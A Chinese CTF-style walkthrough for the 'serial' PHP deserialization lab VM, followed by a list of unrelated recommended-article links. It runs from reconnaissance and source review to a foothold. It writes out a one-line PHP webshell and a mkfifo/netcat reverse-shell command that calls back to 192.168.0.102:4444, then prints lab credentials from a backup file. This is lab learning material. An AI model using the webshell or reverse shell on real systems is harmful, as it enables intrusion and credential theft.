反序列化靶机-serial攻略

1、打开虚拟机

2、扫描活跃的IP和端口

3、访问并查看页面源码

4、使用burpsuite解码,发现其为对象序列化的输出结果

5、扫描目录,找到隐藏目录/backup/

6、访问

7、下载bak.zip,解压发现3个php文件

8、查看代码,发现index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出

9、get shell

制作一句话木马

<?php system($_GET['cmd']);?>

10、构造payload

11、访问192.168.3.179/4.php,将回显的base64编码后序列化的输出结果复制

12、添加反弹shell:

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.102+4444+>/tmp/f

13、反弹成功

14、cd /,然后ls

15、cat credentials.txt.bak

16、账号:sk4 密码:KywZmnPWW6tTbW5w

相关推荐
_.Switch25 分钟前
高级Python自动化运维:容器安全与网络策略的深度解析
运维·网络·python·安全·自动化·devops
JokerSZ.30 分钟前
【基于LSM的ELF文件安全模块设计】参考
运维·网络·安全
SafePloy安策32 分钟前
软件加密与授权管理:构建安全高效的软件使用体系
安全
芯盾时代1 小时前
数字身份发展趋势前瞻:身份韧性与安全
运维·安全·网络安全·密码学·信息与通信
北京搜维尔科技有限公司3 小时前
搜维尔科技:【应用】Xsens在荷兰车辆管理局人体工程学评估中的应用
人工智能·安全
云起无垠4 小时前
技术分享 | 大语言模型赋能软件测试:开启智能软件安全新时代
人工智能·安全·语言模型
ac-er88884 小时前
PHP弱类型安全问题
开发语言·安全·php
One_Blanks4 小时前
渗透测试-Linux基础(1)
linux·运维·安全
易云码5 小时前
信息安全建设方案,网络安全等保测评方案,等保技术解决方案,等保总体实施方案(Word原件)
数据库·物联网·安全·web安全·低代码